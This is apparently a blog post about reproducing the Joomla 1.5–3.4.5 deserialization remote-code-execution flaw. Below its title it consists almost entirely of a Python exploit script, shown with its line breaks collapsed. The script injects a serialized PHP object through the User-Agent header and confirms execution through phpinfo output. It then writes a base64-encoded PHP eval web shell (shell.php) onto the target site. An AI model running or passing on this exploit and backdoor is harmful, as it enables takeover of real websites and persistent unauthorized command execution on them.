joomla 3.6 mysql 版本_Joomla反序列化通杀漏洞（版本低于3.4.5）复现的那些坑

#!/usr/bin/env pythonimport requestsimport sysimport timeimport redef rceJoomla(value):now = time.strftime('%H:%M:%S',time.localtime(time.time()))print "["+str(now)+"] [INFO] Checking Joomla 1.5 - 3.4.5 Remote Code Execution..."if 'http://' in value or 'https://' in value:url=valuecheckJoomlaRCE(url)def checkJoomlaRCE(url):url = url.strip()reg = 'http[s]*://.*/$'m = re.match(reg,url)if not m:url = url + "/"poc = generate_payload("phpinfo();")try:result = get_url(url, poc)if 'phpinfo()' in result:system = getInfoByJoomlaRCE(result, 'System')document_root = getInfoByJoomlaRCE(result, 'DOCUMENT_ROOT')script_filename = getInfoByJoomlaRCE(result, 'SCRIPT_FILENAME')shell_file = getShellByJoomlaRCE(url, system, script_filename)vuls='[+]vuls found! url: '+url+'\n[+]System: '+system+'\n[+]document_root: '+document_root+'\n[+]script_filename: '+script_filename+'\n[+]shell_file: '+shell_fileprint vulselse:print '[!] no vuls! url: '+urlexcept Exception,e:print '[!] connection failed! url: '+urldef get_url(url, user_agent):headers = {'User-Agent': user_agent}cookies = requests.get(url,headers=headers).cookiesfor _ in range(3):response = requests.get(url, timeout=10, headers=headers, cookies=cookies)return response.contentdef generate_payload(php_payload):php_payload = php_payloadterminate = '\xf0\x9d\x8c\x86'exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''injected_payload = "{};JFactory::getConfig();exit".format(php_payload)exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate# print exploit_templatereturn exploit_templatedef getInfoByJoomlaRCE(result, param):if "System" in param:reg = '.*

System ([^<>]*?).*'elif "DOCUMENT_ROOT" in param:reg = '.*DOCUMENT_ROOT ([^<>]*?).*'elif "SCRIPT_FILENAME" in param:reg = '.*SCRIPT_FILENAME ([^<>]*?).*'match_url = re.search(reg,result)if match_url:info=match_url.group(1)else:info = 'no info!'return infodef getShellByJoomlaRCE(url, system, script_filename):if 'no info' not in script_filename and 'no info' not in system:if 'Windows' in system:shell = script_filename.split('index.php')[0].replace('/','//').strip()+"shell.php"else:shell = script_filename.split('index.php')[0]+"shell.php"cmd ="file_put_contents('"+shell+"',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7ID8+'));"pl = generate_payload(cmd)try:get_url(url, pl)return url+"shell.php"except Exception, e:return "no info!"else:return "no info!"def main():rceJoomla(sys.argv[1])if __name__ == '__main__':main()